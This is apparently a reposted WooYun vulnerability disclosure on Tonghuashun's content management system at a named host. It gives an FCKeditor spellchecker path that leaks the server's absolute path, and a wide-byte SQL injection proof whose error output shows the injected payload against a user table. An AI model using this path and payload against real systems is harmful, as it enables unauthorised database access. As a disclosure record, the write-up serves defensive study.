神刀安全网

漏洞标题: 同花顺某系统宽字节注入&绝对路径

漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

同花顺某系统宽字节注入&绝对路径

详细说明:

漏洞标题:  同花顺某系统宽字节注入&绝对路径

code 区域
http://flashcms.10jqka.com.cn/

同花顺网站内容管理系统

存在一个编辑器爆绝对路径问题

code 区域
fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

漏洞标题:  同花顺某系统宽字节注入&绝对路径

code 区域
C://Program Files//Aspell//bin//aspell.exe

漏洞证明:

同时还存在宽字节注入,太晚了,并且过滤了,我简单证明下

漏洞标题:  同花顺某系统宽字节注入&绝对路径

code 区域
msg:MySQL Query Error
sql:select cms_user.*,cms_dutywork.dname from cms_user,cms_dutywork where 1 and email = '1運'/**/between/**/1=1#' and cms_dutywork.`did` = cms_user.`dutyid` and cms_user.inuse = 1
errorMsg:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=1#' AND cms_dutywork.`did` = cms_user.`dutyid` AND cms_user.inuse = 1' at line 2

修复方案:

过滤,二进制执行

版权声明:转载请注明来源 Aasron@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 同花顺某系统宽字节注入&绝对路径

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址